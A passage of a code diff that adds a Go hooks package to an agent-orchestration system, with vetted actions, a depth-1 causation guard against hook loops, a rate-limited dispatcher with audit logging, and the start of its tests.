+	ActionNotify Action = "notify"
+
+	// ActionPause pauses an agent THROUGH THE AUDITED PAUSE API — the same
+	// entry point the dashboard's pause button calls. It never writes the
+	// paused flag directly.
+	ActionPause Action = "pause"
+
+	// ActionAnnotate records a timeline entry (pkg/timeline), building on the
+	// existing event spine rather than a parallel bus.
+	ActionAnnotate Action = "annotate"
+
+	// ActionEnqueueApproval places an approval request into the #4000
+	// tool-approval queue. It CONSUMES that queue's API (see ApprovalQueue);
+	// this package does not implement an approvals store of its own.
+	ActionEnqueueApproval Action = "enqueue-approval"
+)
+
+// vettedActions is the closed action set, used for validation and error text.
+var vettedActions = map[Action]string{
+	ActionNotify:          "Send a notification via the configured ntfy/Slack/Discord fanout.",
+	ActionPause:           "Pause an agent through the audited pause API.",
+	ActionAnnotate:        "Record an entry on the lifecycle timeline.",
+	ActionEnqueueApproval: "Enqueue an approval request into the tool-approval queue.",
+}
+
+// KnownActions returns the vetted action names in sorted order.
+func KnownActions() []Action {
+	out := make([]Action, 0, len(vettedActions))
+	for a := range vettedActions {
+		out = append(out, a)
+	}
+	sort.Slice(out, func(i, j int) bool { return out[i] < out[j] })
+	return out
+}
+
+// IsVettedAction reports whether a is in the closed action set.
+func IsVettedAction(a Action) bool {
+	_, ok := vettedActions[a]
+	return ok
+}
+
+// actionList renders the vetted set for an operator-facing error message.
+func actionList() string {
+	acts := KnownActions()
+	parts := make([]string, 0, len(acts))
+	for _, a := range acts {
+		parts = append(parts, string(a))
+	}
+	return strings.Join(parts, ", ")
+}
+
+// ---------------------------------------------------------------------------
+// Sinks: the narrow interfaces through which actions reach the rest of hive.
+//
+// Every one of these is an INTERFACE rather than a concrete dependency for two
+// reasons. First, import hygiene: pkg/dashboard already imports the agent and
+// config packages, so a direct import here would cycle — the same reason
+// agent.AuditSink exists, and this package follows that established pattern.
+// Second, and more importantly, it makes the mutation surface of the whole
+// hooks feature auditable at a glance: these four interfaces are the COMPLETE
+// list of things a hook can do to the system.
+//
+// The wiring layer (cmd/hive) owns the concrete objects and injects them.
+// Every sink is optional: a nil sink makes its action a no-op that reports a
+// clear error, never a panic and never a silent success.
+// ---------------------------------------------------------------------------
+
+// Notifier is the notification fanout a notify action uses. Satisfied by
+// *notify.Notifier.
+type Notifier interface {
+	Send(title, message string, priority string)
+}
+
+// Pauser is the AUDITED pause API — the same one the dashboard's pause button
+// calls. It takes a Causation so the agent_paused transition the pause itself
+// emits is correctly marked hook-caused and cannot cascade (depth-1 guard).
+//
+// It deliberately does NOT expose an "unpause" or a raw state write: a hook may
+// stop work, but resuming it is a human decision.
+type Pauser interface {
+	PauseAgent(ctx context.Context, agent, reason string, cause Causation) error
+}
+
+// Annotator is the lifecycle timeline's write side. Satisfied by an adapter
+// over *timeline.Store (see the wiring layer) — hooks build on the existing
+// event spine rather than introducing a second one.
+type Annotator interface {
+	Annotate(ctx context.Context, agent, issueRef, note string, attrs map[string]string) error
+}
+
+// ApprovalQueue is the #4000 tool-approval queue's enqueue side.
+//
+// WIRING POINT (#4000): this interface is deliberately narrow so it can be
+// satisfied by that RFC's queue without this package depending on its internal
+// shape. Until it lands the sink is nil and an enqueue-approval hook reports
+// an unwired-sink error per firing (visible in the audit log) rather than
+// silently doing nothing.
+//
+// As of #4057 the target is toolapprove.Inbox, whose enqueue side is
+// `Enqueue(req Request, v Verdict) (string, error)`. Wiring it is an adapter
+// in cmd/hive/hookwire.go — mapping ApprovalRequest onto their Request plus a
+// pending Verdict — passed to the dispatcher via WithApprovalQueue. Nothing in
+// this package changes; that indirection is the whole point of the interface,
+// and it is why this slice could ship before theirs merged.
+type ApprovalQueue interface {
+	EnqueueApproval(ctx context.Context, req ApprovalRequest) error
+}
+
+// ApprovalRequest is what an enqueue-approval hook places on the queue. Fields
+// are the intersection of what a hook can know from a transition payload and
+// what an approval decision needs; #4000's queue is free to carry more.
+type ApprovalRequest struct {
+	// Kind categorizes the approval, taken from the hook's `params.kind` or
+	// defaulted to the transition name.
+	Kind string `json:"kind"`
+	// Agent and Repo scope the request.
+	Agent string `json:"agent,omitempty"`
+	Repo  string `json:"repo,omitempty"`
+	// Summary is the human-readable ask shown in the approvals UI.
+	Summary string `json:"summary"`
+	// Transition and HookName record what produced the request, so an approver
+	// can see which config rule asked and why.
+	Transition Transition `json:"transition"`
+	HookName   string     `json:"hookName"`
+	// Cause carries the depth-1 causation so any transition the approval's
+	// resolution produces stays correctly marked.
+	Cause Causation `json:"cause"`
+}
+
+// ---------------------------------------------------------------------------
+// Action execution
+// ---------------------------------------------------------------------------
+
+// notifyPriority maps a hook's optional params.priority onto the notifier's
+// vocabulary, defaulting to "default" for anything unrecognized. Validation
+// (see registry.go) rejects an unknown priority at load time, so this is a
+// second, defensive layer rather than the primary check.
+func notifyPriority(p string) string {
+	switch strings.ToLower(strings.TrimSpace(p)) {
+	case "high":
+		return "high"
+	case "low":
+		return "low"
+	default:
+		return "default"
+	}
+}
+
+// execute runs one hook's action against a payload. It returns an error rather
+// than logging-and-swallowing so the dispatcher can record the outcome in the
+// audit trail; the dispatcher is what isolates a failure so it cannot affect
+// the transition or another hook.
+func (d *Dispatcher) execute(ctx context.Context, h Hook, p Payload) error {
+	switch h.Action {
+	case ActionNotify:
+		if d.notifier == nil {
+			return fmt.Errorf("notify: no notifier wired")
+		}
+		title, message := renderNotification(h, p)
+		// Send takes no context (the interface stays narrow so pkg/hooks need
+		// not import pkg/notify), so the action timeout has to be enforced
+		// around it rather than inside it. Without this the budget would be
+		// decorative for the one action shipped end-to-end: a hung notifier
+		// would pin its goroutine forever and Wait() would never return.
+		return runBounded(ctx, "notify", func() {
+			d.notifier.Send(title, message, notifyPriority(h.Params["priority"]))
+		})
+
+	case ActionPause:
+		if d.pauser == nil {
+			return fmt.Errorf("pause: no pause API wired")
+		}
+		agent := firstNonEmpty(h.Params["agent"], p.Agent)
+		if agent == "" {
+			return fmt.Errorf("pause: no agent in params or transition payload")
+		}
+		reason := firstNonEmpty(h.Params["reason"],
+			fmt.Sprintf("hook %q on %s", h.Name, p.Transition))
+		// Child() marks the agent_paused transition this pause emits as
+		// hook-caused at depth 1, so it cannot fire further hooks.
+		return d.pauser.PauseAgent(ctx, agent, reason, p.Causation.Child(h.Name, p.Transition))
+
+	case ActionAnnotate:
+		if d.annotator == nil {
+			return fmt.Errorf("annotate: no timeline wired")
+		}
+		note := firstNonEmpty(h.Params["note"],
+			fmt.Sprintf("%s (hook %s)", p.Transition, h.Name))
+		return d.annotator.Annotate(ctx, p.Agent, firstNonEmpty(h.Params["issue_ref"], p.attr("issue_ref")),
+			note, annotationAttrs(h, p))
+
+	case ActionEnqueueApproval:
+		if d.approvals == nil {
+			// #4000 has not landed / is not wired. Report it: an approval that
+			// silently never queues is worse than a loud failure.
+			return fmt.Errorf("enqueue-approval: no approval queue wired (#4000)")
+		}
+		return d.approvals.EnqueueApproval(ctx, ApprovalRequest{
+			Kind:  firstNonEmpty(h.Params["kind"], string(p.Transition)),
+			Agent: firstNonEmpty(h.Params["agent"], p.Agent),
+			Repo:  firstNonEmpty(h.Params["repo"], p.Repo),
+			Summary: firstNonEmpty(h.Params["summary"],
+				fmt.Sprintf("%s requires approval (hook %s)", p.Transition, h.Name)),
+			Transition: p.Transition,
+			HookName:   h.Name,
+			Cause:      p.Causation.Child(h.Name, p.Transition),
+		})
+	}
+
+	// Unreachable for a registry-validated hook: an unknown action is rejected
+	// at load time. Kept as a fail-closed backstop for a Hook constructed in
+	// code that bypassed validation.
+	return fmt.Errorf("unknown action %q", h.Action)
+}
+
+// annotationAttrs builds the timeline attrs for an annotate action: the hook's
+// provenance plus the model metadata when the transition carries it, so a
+// timeline reader sees the same context the notification would have shown.
+func annotationAttrs(h Hook, p Payload) map[string]string {
+	attrs := map[string]string{
+		"hook":       h.Name,
+		"transition": string(p.Transition),
+	}
+	if p.Model != "" {
+		attrs["model"] = p.Model
+	}
+	if p.Backend != "" {
+		attrs["backend"] = p.Backend
+	}
+	if p.Pin != "" {
+		attrs["pin"] = p.Pin
+	}
+	return attrs
+}
+
+// runBounded runs a context-less sink call under the action's deadline,
+// returning as soon as ctx expires even if the call itself is still stuck.
+//
+// The abandoned goroutine is NOT leaked in the usual sense: it finishes
+// whenever the sink finally returns and then exits. What this buys is that a
+// wedged sink cannot pin the dispatch goroutine or block Wait() forever, so a
+// single hung notifier degrades to one timed-out hook rather than a dispatcher
+// that never settles. The channel is buffered so that send never blocks even
+// after the receiver has walked away.
+func runBounded(ctx context.Context, action string, call func()) error {
+	// Buffered so the detached goroutine can always report and exit, even
+	// after a timeout has left no receiver.
+	done := make(chan error, 1)
+	go func() {
+		defer func() {
+			// A panicking sink must not crash the process from this detached
+			// goroutine, where runOne's recover cannot reach it. Report it as
+			// an error so it is still audited as a hook FAILURE rather than
+			// being swallowed into a false success.
+			if r := recover(); r != nil {
+				done <- fmt.Errorf("%s: panic: %v", action, r)
+			}
+		}()
+		call()
+		done <- nil
+	}()
+
+	select {
+	case err := <-done:
+		return err
+	case <-ctx.Done():
+		return fmt.Errorf("%s: timed out after %s", action, hookActionTimeout)
+	}
+}
+
+// firstNonEmpty returns the first argument that is not empty after trimming.
+func firstNonEmpty(vals ...string) string {
+	for _, v := range vals {
+		if strings.TrimSpace(v) != "" {
+			return v
+		}
+	}
+	return ""
+}

--- a/src/pkg/hooks/causation.go
+++ b/src/pkg/hooks/causation.go
@@ -1,0 +1,81 @@
+package hooks
+
+// Causation records why a transition happened, and is the mechanism that makes
+// hook→transition→hook loops structurally impossible rather than merely
+// unlikely.
+//
+// # The loop
+//
+// `pause` is both an ACTION and a TRANSITION. A hook on agent_paused whose
+// action is pause therefore feeds itself; so does any longer cycle
+// (escalation_red → pause → agent_paused → notify → …). Rate limiting alone
+// does not fix this — it only slows the storm down, and a slow infinite loop is
+// still an infinite loop that fills the audit log.
+//
+// # The guard
+//
+// Depth 1, as specified in RFC #4001: a transition CAUSED BY A HOOK does not
+// itself fire hooks. Every payload carries its Depth; Fire refuses to dispatch
+// when Depth > 0. Because the guard is checked in Fire — the single entry point
+// — no emitting site can forget it, and no action can opt out of it.
+//
+// Depth 1 rather than a configurable cap is deliberate for this slice. A
+// configurable depth invites an operator to raise it, and the useful cases
+// (notify on a state change, enqueue an approval) are all depth-0 → depth-1.
+// Genuine multi-stage reactions should be expressed as multiple hooks on real
+// transitions, which stays auditable, instead of a chain that is hard to reason
+// about and easy to make cyclic.
+type Causation struct {
+	// Depth is 0 for a transition caused by the world (an operator, the
+	// governor, CI) and 1 for one caused by a hook action. Fire will not
+	// dispatch hooks for a payload with Depth > 0.
+	Depth int `json:"depth"`
+
+	// HookName is the hook whose action caused this transition, empty at
+	// depth 0. It makes the audit trail answer "why did this agent pause?"
+	// with a config rule name rather than just "system".
+	HookName string `json:"hookName,omitempty"`
+
+	// OriginTransition is the transition at the root of the chain, empty at
+	// depth 0. Together with HookName it is the full causal story for a
+	// depth-1 transition.
+	OriginTransition Transition `json:"originTransition,omitempty"`
+}
+
+// maxHookDepth is the hard causation cap. Transitions at or above this depth do
+// not fire hooks. Named rather than inlined as `> 0` so the guard reads as the
+// deliberate policy it is, and so raising it later is a single, reviewable
+// edit rather than a hunt for bare integer comparisons.
+const maxHookDepth = 1
+
+// IsHookCaused reports whether this transition was produced by a hook action
+// rather than by the world.
+func (c Causation) IsHookCaused() bool { return c.Depth > 0 }
+
+// MayFireHooks reports whether a transition with this causation is allowed to
+// dispatch hooks. This is the depth-1 guard, and Fire is its only caller.
+func (c Causation) MayFireHooks() bool { return c.Depth < maxHookDepth }
+
+// Child returns the causation an action must attach to any transition it
+// causes, so the resulting transition is correctly marked hook-caused and
+// cannot cascade.
+//
+// Actions that mutate state through an audited API (pause, enqueue-approval)
+// pass this down so the downstream transition — which the audited API will
+// itself emit — carries the chain. An action that neglects to do so would
+// produce a depth-0 transition and reopen the loop, which is why the mutating
+// actions take a Causation parameter rather than deriving one.
+func (c Causation) Child(hookName string, origin Transition) Causation {
+	// The origin is preserved from the root of the chain when one already
+	// exists, so a depth-1 transition names the real cause and not its
+	// immediate predecessor.
+	rootOrigin := c.OriginTransition
+	if rootOrigin == "" {
+		rootOrigin = origin
+	}
+	return Causation{
+		Depth:            c.Depth + 1,
+		HookName:         hookName,
+		OriginTransition: rootOrigin,
+	}
+}

--- a/src/pkg/hooks/dispatcher.go
+++ b/src/pkg/hooks/dispatcher.go
@@ -1,0 +1,362 @@
+package hooks
+
+import (
+	"context"
+	"fmt"
+	"log/slog"
+	"sync"
+	"time"
+)
+
+// AuditSink records every hook firing durably. It mirrors agent.AuditSink's
+// shape so the dashboard's existing recorder satisfies both without an adapter,
+// and so hook firings land in /data/audit.jsonl alongside every other
+// privileged action — which is the RFC's requirement that hooks be as
+// auditable as a dashboard button.
+type AuditSink interface {
+	Record(actor, action, agentName string, fields map[string]any)
+}
+
+// Audit action names for hook firings. Snake_case to match the dashboard's
+// existing audit vocabulary so the Audit Log UI's filter treats them uniformly.
+const (
+	// AuditHookFired records a hook whose action completed successfully.
+	AuditHookFired = "hook_fired"
+	// AuditHookFailed records a hook whose action returned an error. The
+	// transition and every other hook are unaffected.
+	AuditHookFailed = "hook_failed"
+	// AuditHookRateLimited records a firing suppressed by the rate limit.
+	// Recorded rather than dropped silently: a hook that stops firing because
+	// it hit its ceiling must be diagnosable.
+	AuditHookRateLimited = "hook_rate_limited"
+	// AuditHookSuppressed records hooks not dispatched because the transition
+	// was itself hook-caused (the depth-1 causation guard). One entry per
+	// transition, not per hook, since the whole dispatch is skipped.
+	AuditHookSuppressed = "hook_suppressed_depth"
+)
+
+// auditActorSystem attributes a firing to the hive process rather than a
+// person. Hooks fire off durable state transitions, not HTTP requests, so
+// there is no authenticated user; the human who WROTE the hook is recorded in
+// config provenance, and the hook name is in every audit entry.
+const auditActorSystem = "system"
+
+// hookActionTimeout bounds how long a single hook action may take. Hooks fire
+// off the post-commit path in a background goroutine, so a hung action cannot
+// block a transition — but without a bound it would leak a goroutine and, for
+// the pause action, hold a slot indefinitely. The budget is generous relative
+// to the actions in the vetted set (notify's HTTP client already has its own
+// 10s timeout; pause and annotate are local).
+const hookActionTimeout = 30 * time.Second
+
+// Dispatcher fires hooks on committed state transitions.
+//
+// # Guarantees
+//
+//  1. POST-COMMIT ONLY. Fire is called by an emitting site AFTER the durable
+//     write succeeds. The dispatcher never sits inline in the critical path:
+//     Fire hands work to a goroutine and returns immediately, so no hook can
+//     slow, block, or fail the transition that triggered it. A hook fired
+//     before the persist could act on a transition that never durably
+//     happened, which recent incident history says is not hypothetical.
+//  2. DEPTH-1 CAUSATION. A transition caused by a hook action does not fire
+//     hooks. Checked in Fire, the single entry point, so no emitter or action
+//     can bypass it.
+//  3. PER-HOOK RATE LIMIT. Every hook has a firings-per-minute ceiling, so a
+//     flapping transition cannot become a notification storm.
+//  4. FAILURE ISOLATION. Each hook runs independently with its own recovered
+//     panic boundary; one bad hook affects neither the transition nor any
+//     other hook.
+//  5. EVERY FIRING IS AUDITED — success, failure, rate-limit, and depth
+//     suppression all land in the audit log.
+//
+// The zero value is not usable; construct with NewDispatcher.
+type Dispatcher struct {
+	// mu guards registry and limiter. Held only briefly to snapshot the
+	// matching hooks — never across an action, which would serialize every
+	// hook in the fleet behind the slowest one.
+	mu       sync.Mutex
+	registry *Registry
+	limiter  *rateLimiter
+
+	// Sinks. Each is optional; a nil sink makes its action a reported error
+	// rather than a panic or a silent success.
+	notifier  Notifier
+	pauser    Pauser
+	annotator Annotator
+	approvals ApprovalQueue
+
+	audit  AuditSink
+	logger *slog.Logger
+
+	// now is the clock, injectable so rate-limit tests do not sleep.
+	now func() time.Time
+
+	// wg tracks in-flight hook goroutines so tests (and a graceful shutdown)
+	// can wait for dispatch to settle. Without it, an async dispatcher is
+	// untestable except by sleeping, and sleep-based tests are flaky tests.
+	wg sync.WaitGroup
+}
+
+// Option configures a Dispatcher.
+type Option func(*Dispatcher)
+
+// WithNotifier wires the notification fanout for the notify action.
+func WithNotifier(n Notifier) Option { return func(d *Dispatcher) { d.notifier = n } }
+
+// WithPauser wires the audited pause API for the pause action.
+func WithPauser(p Pauser) Option { return func(d *Dispatcher) { d.pauser = p } }
+
+// WithAnnotator wires the lifecycle timeline for the annotate action.
+func WithAnnotator(a Annotator) Option { return func(d *Dispatcher) { d.annotator = a } }
+
+// WithApprovalQueue wires the #4000 tool-approval queue for the
+// enqueue-approval action. See the ApprovalQueue doc for the wiring point.
+func WithApprovalQueue(q ApprovalQueue) Option { return func(d *Dispatcher) { d.approvals = q } }
+
+// WithAuditSink wires durable audit recording of every firing.
+func WithAuditSink(s AuditSink) Option { return func(d *Dispatcher) { d.audit = s } }
+
+// WithClock overrides the dispatcher's clock. For tests.
+func WithClock(now func() time.Time) Option {
+	return func(d *Dispatcher) {
+		if now != nil {
+			d.now = now
+		}
+	}
+}
+
+// NewDispatcher builds a Dispatcher over a compiled registry. A nil registry is
+// valid and means "no hooks configured" — every Fire is then a cheap no-op.
+func NewDispatcher(reg *Registry, logger *slog.Logger, opts ...Option) *Dispatcher {
+	if logger == nil {
+		logger = slog.Default()
+	}
+	d := &Dispatcher{
+		registry: reg,
+		limiter:  newRateLimiter(),
+		logger:   logger,
+		now:      time.Now,
+	}
+	for _, opt := range opts {
+		opt(d)
+	}
+	return d
+}
+
+// SetRegistry atomically swaps the hook set, for config hot reload. In-flight
+// dispatches finish against the registry they started with; subsequent Fires
+// use the new one. The rate limiter is deliberately PRESERVED across a swap:
+// resetting it would let an operator (or a reload loop) clear the storm
+// ceiling by touching the config.
+func (d *Dispatcher) SetRegistry(reg *Registry) {
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	d.registry = reg
+}
+
+// Len reports the number of registered hooks. Nil-safe.
+func (d *Dispatcher) Len() int {
+	if d == nil {
+		return 0
+	}
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	return d.registry.Len()
+}
+
+// Wait blocks until all in-flight hook actions complete. Intended for tests
+// and graceful shutdown; it does not prevent new Fires.
+func (d *Dispatcher) Wait() {
+	if d == nil {
+		return
+	}
+	d.wg.Wait()
+}
+
+// Fire dispatches the hooks registered for a committed transition.
+//
+// CALL THIS ONLY AFTER THE DURABLE WRITE SUCCEEDS. Fire returns immediately;
+// hook actions run in the background, so the caller's critical path is never
+// extended and a hook can never fail the transition.
+//
+// Nil-safe and cheap when no hooks match: a Dispatcher with an empty registry
+// costs one map lookup.
+func (d *Dispatcher) Fire(ctx context.Context, p Payload) {
+	if d == nil {
+		return
+	}
+	if p.At == 0 {
+		p.At = d.now().UnixMilli()
+	}
+
+	// Defensively copy Attrs. Fire takes Payload by value, but a map field is
+	// only a header: the caller and every hook goroutine would otherwise share
+	// one map. Because dispatch is ASYNCHRONOUS, an emitting site that reuses
+	// or mutates its attrs map after Fire returns — entirely reasonable-looking
+	// code, since Fire appears to have finished — would race the hooks reading
+	// it, and a racy read on the post-commit path is exactly the kind of bug
+	// that shows up only under production concurrency.
+	//
+	// Copying here rather than documenting a "do not touch this map afterwards"
+	// rule keeps the hazard out of every current and future emitter.
+	if p.Attrs != nil {
+		attrs := make(map[string]string, len(p.Attrs))
+		for k, v := range p.Attrs {
+			attrs[k] = v
+		}
+		p.Attrs = attrs
+	}
+
+	// GUARANTEE 2 — the depth-1 causation guard. Checked before anything else
+	// and in the one place every firing must pass through, so a hook-caused
+	// transition can never cascade regardless of which emitter produced it.
+	if !p.Causation.MayFireHooks() {
+		d.logger.Debug("hooks: transition is hook-caused; not firing hooks (depth-1 guard)",
+			"transition", p.Transition,
+			"causedBy", p.Causation.HookName,
+			"origin", p.Causation.OriginTransition)
+		d.record(AuditHookSuppressed, "", p.Agent, map[string]any{
+			"transition": string(p.Transition),
+			"reason":     "depth-1 causation guard",
+			"caused_by":  p.Causation.HookName,
+			"origin":     string(p.Causation.OriginTransition),
+		})
+		return
+	}
+
+	// Snapshot the matching hooks and their rate-limit decisions under the
+	// lock, then release it before running any action.
+	//
+	// NOTE the ordering: the rate limit is consumed HERE, before the `when:`
+	// predicate is evaluated in runOne, so a firing that the predicate later
+	// declines still costs a slot. That is deliberate — the limit bounds the
+	// work a flapping transition can induce, and predicate evaluation is
+	// itself part of that work, so checking the cheap counter first is what
+	// keeps a storm from turning into a CEL-evaluation storm. The tradeoff is
+	// that a hook with a highly selective predicate on a noisy transition can
+	// exhaust its quota without ever firing; such a hook wants a higher
+	// rate_limit_per_minute, and the suppression is visible in the audit log
+	// as hook_rate_limited rather than being silent.
+	type dispatch struct {
+		hook Hook
+		pred *predicate
+	}
+	var runnable []dispatch
+	var limited []Hook
+
+	d.mu.Lock()
+	now := d.now()
+	for _, ch := range d.registry.For(p.Transition) {
+		if !d.limiter.allow(ch.hook.Name, ch.hook.effectiveRateLimit(), now) {
+			limited = append(limited, ch.hook)
+			continue
+		}
+		runnable = append(runnable, dispatch{hook: ch.hook, pred: ch.pred})
+	}
+	d.mu.Unlock()
+
+	for _, h := range limited {
+		d.logger.Warn("hooks: firing suppressed by rate limit",
+			"hook", h.Name, "transition", p.Transition, "limit", h.effectiveRateLimit())
+		d.record(AuditHookRateLimited, h.Name, p.Agent, map[string]any{
+			"transition": string(p.Transition),
+			"limit":      h.effectiveRateLimit(),
+		})
+	}
+
+	if len(runnable) == 0 {
+		return
+	}
+
+	// GUARANTEE 1 — post-commit and off the critical path. Each hook runs in
+	// its own goroutine so the emitting site returns immediately and one slow
+	// action cannot delay another hook.
+	for _, dp := range runnable {
+		d.wg.Add(1)
+		go func(h Hook, pred *predicate) {
+			defer d.wg.Done()
+			d.runOne(ctx, h, pred, p)
+		}(dp.hook, dp.pred)
+	}
+}
+
+// runOne evaluates one hook's predicate and executes its action, isolating any
+// failure. This is GUARANTEE 4: the recovered panic boundary plus the returned
+// error mean a hook that misbehaves — including one that panics inside a sink
+// implementation — cannot take down the dispatch goroutine, the transition, or
+// another hook.
+func (d *Dispatcher) runOne(ctx context.Context, h Hook, pred *predicate, p Payload) {
+	defer func() {
+		if r := recover(); r != nil {
+			d.logger.Error("hooks: action panicked; isolated",
+				"hook", h.Name, "transition", p.Transition, "panic", r)
+			d.record(AuditHookFailed, h.Name, p.Agent, map[string]any{
+				"transition": string(p.Transition),
+				"action":     string(h.Action),
+				"error":      fmt.Sprintf("panic: %v", r),
+			})
+		}
+	}()
+
+	// The `when:` predicate. Fail-closed: an unevaluable predicate is a
+	// no-match, so a broken expression can never cause an action to run.
+	if !pred.matches(p, d.logger) {
+		d.logger.Debug("hooks: when-predicate did not match; skipping",
+			"hook", h.Name, "transition", p.Transition)
+		return
+	}
+
+	// The action gets its own bounded context so a hung sink cannot leak a
+	// goroutine forever. Derived from the caller's ctx so shutdown still
+	// cancels promptly.
+	actionCtx, cancel := context.WithTimeout(ctx, hookActionTimeout)
+	defer cancel()
+
+	fields := map[string]any{
+		"transition": string(p.Transition),
+		"action":     string(h.Action),
+	}
+	// Carry the model metadata into the audit entry when the transition has
+	// it, so the audit log alone answers "which model produced the rejected
+	// output" without a join against tracing.
+	if p.Model != "" {
+		fields["model"] = p.Model
+	}
+	if p.Backend != "" {
+		fields["backend"] = p.Backend
+	}
+	if p.Pin != "" {
+		fields["pin"] = p.Pin
+	}
+
+	if err := d.execute(actionCtx, h, p); err != nil {
+		d.logger.Error("hooks: action failed; transition and other hooks unaffected",
+			"hook", h.Name, "transition", p.Transition, "action", h.Action, "error", err)
+		fields["error"] = err.Error()
+		fields["outcome"] = "failure"
+		d.record(AuditHookFailed, h.Name, p.Agent, fields)
+		return
+	}
+
+	d.logger.Info("hooks: fired",
+		"hook", h.Name, "transition", p.Transition, "action", h.Action)
+	fields["outcome"] = "success"
+	d.record(AuditHookFired, h.Name, p.Agent, fields)
+}
+
+// record writes one audit entry, tolerating an unwired sink. GUARANTEE 5.
+// The hook name is carried in fields rather than the agent slot so an entry
+// always names the responsible config rule even for a transition with no agent.
+func (d *Dispatcher) record(action, hookName, agentName string, fields map[string]any) {
+	if d.audit == nil {
+		return
+	}
+	if fields == nil {
+		fields = map[string]any{}
+	}
+	if hookName != "" {
+		fields["hook"] = hookName
+	}
+	d.audit.Record(auditActorSystem, action, agentName, fields)
+}

--- a/src/pkg/hooks/dispatcher_test.go
+++ b/src/pkg/hooks/dispatcher_test.go
@@ -1,0 +1,1006 @@
+package hooks
+
+import (
+	"context"
+	"errors"
+	"io"
+	"log/slog"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+// quietLogger keeps expected-failure tests from spamming the test output. The
+// dispatcher logs failures at Error level by design, so tests that deliberately
+// fail a hook would otherwise be unreadable.
+func quietLogger() *slog.Logger {
+	return slog.New(slog.NewTextHandler(io.Discard, nil))
+}
+
+// ---------------------------------------------------------------------------
+// Test doubles
+// ---------------------------------------------------------------------------
+
+type sentNotification struct {
+	title, message, priority string
+}
+
+type fakeNotifier struct {
+	mu   sync.Mutex
+	sent []sentNotification
+}
+
+func (f *fakeNotifier) Send(title, message, priority string) {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	f.sent = append(f.sent, sentNotification{title, message, priority})
+}
+
+func (f *fakeNotifier) all() []sentNotification {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]sentNotification(nil), f.sent...)
+}
+
+func (f *fakeNotifier) count() int { return len(f.all()) }
+
+type pauseCall struct {
+	agent, reason string
+	cause         Causation
+}
+
+// fakePauser records pause calls and, crucially, re-emits the agent_paused
+// transition the real audited pause API would emit — which is what lets the
+// cascade test observe whether the depth-1 guard actually holds.
+type fakePauser struct {
+	mu    sync.Mutex
+	calls []pauseCall
+	// dispatcher, when set, receives the agent_paused transition that the
+	// pause causes, exactly as the real pause path would.
+	dispatcher *Dispatcher
+	err        error
+}
+
+func (f *fakePauser) PauseAgent(ctx context.Context, agent, reason string, cause Causation) error {
+	f.mu.Lock()
+	f.calls = append(f.calls, pauseCall{agent, reason, cause})
+	f.mu.Unlock()
+	if f.err != nil {
+		return f.err
+	}
+	if f.dispatcher != nil {
+		f.dispatcher.Fire(ctx, Payload{
+			Transition: TransitionAgentPaused,
+			Agent:      agent,
+			Reason:     reason,
+			Causation:  cause,
+		})
+	}
+	return nil
+}
+
+func (f *fakePauser) all() []pauseCall {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]pauseCall(nil), f.calls...)
+}
+
+type annotation struct {
+	agent, issueRef, note string
+	attrs                 map[string]string
+}
+
+type fakeAnnotator struct {
+	mu    sync.Mutex
+	notes []annotation
+}
+
+func (f *fakeAnnotator) Annotate(ctx context.Context, agent, issueRef, note string, attrs map[string]string) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	f.notes = append(f.notes, annotation{agent, issueRef, note, attrs})
+	return nil
+}
+
+func (f *fakeAnnotator) all() []annotation {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]annotation(nil), f.notes...)
+}
+
+type fakeApprovals struct {
+	mu   sync.Mutex
+	reqs []ApprovalRequest
+}
+
+func (f *fakeApprovals) EnqueueApproval(ctx context.Context, r ApprovalRequest) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	f.reqs = append(f.reqs, r)
+	return nil
+}
+
+func (f *fakeApprovals) all() []ApprovalRequest {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]ApprovalRequest(nil), f.reqs...)
+}
+
+type auditEntry struct {
+	actor, action, agent string
+	fields               map[string]any
+}
+
+type fakeAudit struct {
+	mu      sync.Mutex
+	entries []auditEntry
+}
+
+func (f *fakeAudit) Record(actor, action, agentName string, fields map[string]any) {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	f.entries = append(f.entries, auditEntry{actor, action, agentName, fields})
+}
+
+func (f *fakeAudit) all() []auditEntry {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	return append([]auditEntry(nil), f.entries...)
+}
+
+func (f *fakeAudit) withAction(action string) []auditEntry {
+	var out []auditEntry
+	for _, e := range f.all() {
+		if e.action == action {
+			out = append(out, e)
+		}
+	}
+	return out
+}
+
+// panickingNotifier models a sink that blows up, to prove failure isolation
+// covers panics and not just returned errors.
+type panickingNotifier struct{}
+
+func (panickingNotifier) Send(title, message, priority string) {
+	panic("sink exploded")
+}
+
+// mustRegistry compiles hooks or fails the test.
+func mustRegistry(t *testing.T, hooks ...Hook) *Registry {
+	t.Helper()
+	reg, err := Compile(hooks)
+	if err != nil {
+		t.Fatalf("compile: %v", err)
+	}
+	return reg
+}
+
+// ---------------------------------------------------------------------------
+// GUARANTEE 2 — depth-1 causation guard (loop prevention)
+// ---------------------------------------------------------------------------
+
+// TestDepth1GuardBlocksHookTriggeredCascade is the loop-prevention regression
+// test. The setup is the exact cycle the RFC calls out: a hook on
+// agent_paused whose action is pause. Without the guard this recurses forever.
+//
+// It asserts the INVARIANT (exactly one pause, from the world-caused
+// transition) rather than merely "it terminated", and includes a positive
+// control below proving the hook does fire when the transition is
+// world-caused — so the test cannot pass just because nothing ever ran.
+func TestDepth1GuardBlocksHookTriggeredCascade(t *testing.T) {
+	audit := &fakeAudit{}
+	pauser := &fakePauser{}
+
+	// A self-feeding hook: pausing an agent fires the pause hook again.
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "pause-on-pause", On: TransitionAgentPaused, Action: ActionPause,
+		}),
+		quietLogger(),
+		WithPauser(pauser),
+		WithAuditSink(audit),
+	)
+	// Close the loop: the pause API re-emits agent_paused, as the real one does.
+	pauser.dispatcher = d
+
+	// A world-caused pause (depth 0) — this one MAY fire hooks.
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionAgentPaused,
+		Agent:      "reviewer",
+		Trigger:    "operator",
+	})
+	d.Wait()
+
+	calls := pauser.all()
+	if len(calls) != 1 {
